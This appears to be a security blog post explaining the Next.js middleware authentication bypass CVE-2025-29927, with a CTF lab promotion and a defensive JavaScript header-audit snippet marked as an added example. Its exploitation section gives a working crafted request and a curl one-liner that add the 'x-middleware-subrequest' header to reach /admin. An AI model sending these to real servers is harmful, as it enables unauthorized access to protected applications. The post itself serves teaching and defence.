
What is Next.js?
Next.js is a web development framework developed by Vercel and built on top of React,
which enables developers to build fast, scalable, high-performance and user-friendly web applications.
What is this Vulnerability About?
On 21 Mar 2025, CVE-2025-29927 was made public by the Next.js maintainers. The
vulnerability can lead to an authentication bypass. It was discovered by
Rachid and Yasser Allam, and it makes it possible to bypass authentication when the
authentication check is performed in middleware. Middleware is a powerful feature that allows developers to run custom
code before a request is completed. The bypass is triggered by a crafted HTTP request that
contains the internal header ‘x-middleware-subrequest’. It affects versions earlier than 15.2.3 for 15.x, earlier than 12.3.5 for 12.x, earlier than 13.5.9 for 13.x, and earlier than 14.2.25 for 14.x.
🚨 New Arena Lab Dropped!
Middleman (CVE-2025-29927) is now live on Parrot CTFs!
💥 Learn how to exploit a middleware authentication bypass in Next.js and gain access to protected routes.
🔓 Easy difficulty – perfect for sharpening your web exploitation skills!
🏆 Earn 10…
— Parrot CTFs (@parrot_ctfs) April 11, 2025
How is this vulnerability exploitable?
To be exploitable, the victim Next.js server must use Next.js middleware; the attack
itself is quite simple and straightforward.
The middleware lives in a middleware.ts file. The middleware function stands between
the request and the final response, so incoming requests can be redirected, rewritten,
or modified before the handler processes them.
Technical Analysis
- This is the scenario for CVE-2025-29927
- As we discussed earlier, the victim must use the middleware feature to perform
authentication on the Next.js server (with no other authentication layer).


‘x-middleware-subrequest’ indicates that a request is an internal subrequest that was
initiated by middleware rather than a direct request from a user. The correct
operation of several internal Next.js features depends on this header: it keeps
track of whether the middleware has already run, and its presence prevents
endless request loops. However, because the presence of this header means
that the request should skip certain middleware checks, this approach
inadvertently introduces a vulnerability that permits authentication bypass.
Exploitation Method
Modify this request
GET /admin HTTP/1.1
Host: 192.168.248.133
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
To This Request
GET /admin HTTP/1.1
Host: 192.168.248.133
x-middleware-subrequest: 1
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
We can make the same request with the curl command line utility.
curl -H "x-middleware-subrequest: 1" http://<machine-ip>/admin
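The defensive counterpart to the request above, as an added example that is not code from the post or from Next.js: a small edge-side audit that parses raw HTTP request heads like the two shown, flags any request arriving from outside with the internal ‘x-middleware-subrequest’ header (whatever its value), and strips it before the request is forwarded so the middleware still runs. The sample requests are constructed here to mirror the post; patching is the real fix, this is a stopgap and a detection aid.

```javascript
// Added example (not from the post or Next.js): edge-side handling of the
// internal header that CVE-2025-29927 abuses. Patching Next.js is the real fix;
// this is a stopgap and a detection aid for a reverse proxy or WAF layer.
const INTERNAL_HEADER = 'x-middleware-subrequest';

// Parse a raw HTTP/1.1 request head (request line + headers) into an object.
function parseRawRequest(raw) {
  const lines = raw.replace(/\r\n/g, '\n').split('\n').filter((l) => l.length > 0);
  const [method, path, version] = lines[0].split(' ');
  const headers = {};
  for (const line of lines.slice(1)) {
    const idx = line.indexOf(':');
    if (idx === -1) continue; // malformed header line, ignore it
    const name = line.slice(0, idx).trim().toLowerCase(); // header names are case-insensitive
    headers[name] = line.slice(idx + 1).trim();
  }
  return { method, path, version, headers };
}

// Return a copy of the headers without the internal header, plus whether it was present.
function stripInternalHeader(headers) {
  const cleaned = {};
  let wasPresent = false;
  for (const [name, value] of Object.entries(headers)) {
    if (name.toLowerCase() === INTERNAL_HEADER) { wasPresent = true; continue; }
    cleaned[name] = value;
  }
  return { headers: cleaned, wasPresent };
}

// Audit a batch of raw requests: flag bypass attempts and return sanitized headers.
function auditRequests(rawRequests) {
  return rawRequests.map((raw) => {
    const req = parseRawRequest(raw);
    const { headers, wasPresent } = stripInternalHeader(req.headers);
    return { path: req.path, host: headers.host, flagged: wasPresent, headers };
  });
}

// Constructed samples mirroring the two requests shown in the post.
const SAMPLE_REQUESTS = [
  'GET /admin HTTP/1.1\r\nHost: 192.168.248.133\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: keep-alive\r\n\r\n',
  'GET /admin HTTP/1.1\r\nHost: 192.168.248.133\r\nX-Middleware-Subrequest: 1\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: keep-alive\r\n\r\n',
];

for (const r of auditRequests(SAMPLE_REQUESTS)) {
  console.log(`${r.flagged ? 'ALERT' : 'ok   '} ${r.host} ${r.path}`);
}
```

Any hit on the flagged path is worth an alert on its own: legitimate browsers and curl never send this header, so it is a high-fidelity indicator of a bypass attempt.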
Conclusion
This vulnerability shows how a seemingly innocuous internal header in Next.js can circumvent important
middleware checks, allowing unauthorized access to restricted routes. It serves as a
reminder of how important it is to keep up with dependency updates and audit
authorization logic. Patching CVE-2025-29927 should be a top priority for
organizations running publicly accessible Next.js applications, to reduce
exposure to this kind of exploit.
You can check out our lab as well:
Comments (1)
Jonny nicks says:
April 10, 2025 at 6:08 pm
Awesome dogslice